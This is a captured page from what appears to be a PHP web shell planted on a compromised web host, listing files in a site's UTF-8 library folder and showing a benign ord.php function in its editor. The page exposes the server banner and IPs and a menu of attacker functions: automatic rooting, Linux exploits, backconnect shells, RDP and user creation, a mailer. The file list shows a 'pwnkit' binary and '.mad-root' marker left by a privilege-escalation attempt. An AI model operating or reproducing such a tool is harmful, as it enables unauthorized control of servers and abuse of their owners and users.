Linux webm008.cluster106.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.106.20.8 | : 216.73.217.10
Cant Read [ /etc/named.conf ]
5.6.40
associattd
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
associattd /
www-old /
libraries /
phputf8 /
[ HOME SHELL ]
Name
Size
Permission
Action
mbstring
[ DIR ]
drwxr-xr-x
native
[ DIR ]
drwxr-xr-x
utils
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
LICENSE
25.81
KB
-rw-r--r--
README
3.29
KB
-rw-r--r--
ord.php
2.35
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
str_ireplace.php
1.95
KB
-rw-r--r--
str_pad.php
1.67
KB
-rw-r--r--
str_split.php
824
B
-rw-r--r--
strcasecmp.php
546
B
-rw-r--r--
strcspn.php
894
B
-rw-r--r--
stristr.php
855
B
-rw-r--r--
strrev.php
458
B
-rw-r--r--
strspn.php
923
B
-rw-r--r--
substr_replace.php
600
B
-rw-r--r--
trim.php
2.18
KB
-rw-r--r--
ucfirst.php
787
B
-rw-r--r--
ucwords.php
1.44
KB
-rw-r--r--
utf8.php
2.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ord.php
<?php /** * @version $Id$ * @package utf8 * @subpackage strings */ //--------------------------------------------------------------- /** * UTF-8 aware alternative to ord * Returns the unicode ordinal for a character * @param string UTF-8 encoded character * @return int unicode ordinal for the character * @see http://www.php.net/ord * @see http://www.php.net/manual/en/function.ord.php#46267 */ function utf8_ord($chr) { $ord0 = ord($chr); if ( $ord0 >= 0 && $ord0 <= 127 ) { return $ord0; } if ( !isset($chr{1}) ) { trigger_error('Short sequence - at least 2 bytes expected, only 1 seen'); return FALSE; } $ord1 = ord($chr{1}); if ( $ord0 >= 192 && $ord0 <= 223 ) { return ( $ord0 - 192 ) * 64 + ( $ord1 - 128 ); } if ( !isset($chr{2}) ) { trigger_error('Short sequence - at least 3 bytes expected, only 2 seen'); return FALSE; } $ord2 = ord($chr{2}); if ( $ord0 >= 224 && $ord0 <= 239 ) { return ($ord0-224)*4096 + ($ord1-128)*64 + ($ord2-128); } if ( !isset($chr{3}) ) { trigger_error('Short sequence - at least 4 bytes expected, only 3 seen'); return FALSE; } $ord3 = ord($chr{3}); if ($ord0>=240 && $ord0<=247) { return ($ord0-240)*262144 + ($ord1-128)*4096 + ($ord2-128)*64 + ($ord3-128); } if ( !isset($chr{4}) ) { trigger_error('Short sequence - at least 5 bytes expected, only 4 seen'); return FALSE; } $ord4 = ord($chr{4}); if ($ord0>=248 && $ord0<=251) { return ($ord0-248)*16777216 + ($ord1-128)*262144 + ($ord2-128)*4096 + ($ord3-128)*64 + ($ord4-128); } if ( !isset($chr{5}) ) { trigger_error('Short sequence - at least 6 bytes expected, only 5 seen'); return FALSE; } if ($ord0>=252 && $ord0<=253) { return ($ord0-252) * 1073741824 + ($ord1-128)*16777216 + ($ord2-128)*262144 + ($ord3-128)*4096 + ($ord4-128)*64 + (ord($chr{5})-128); } if ( $ord0 >= 254 && $ord0 <= 255 ) { trigger_error('Invalid UTF-8 with surrogate ordinal '.$ord0); return FALSE; } }
Close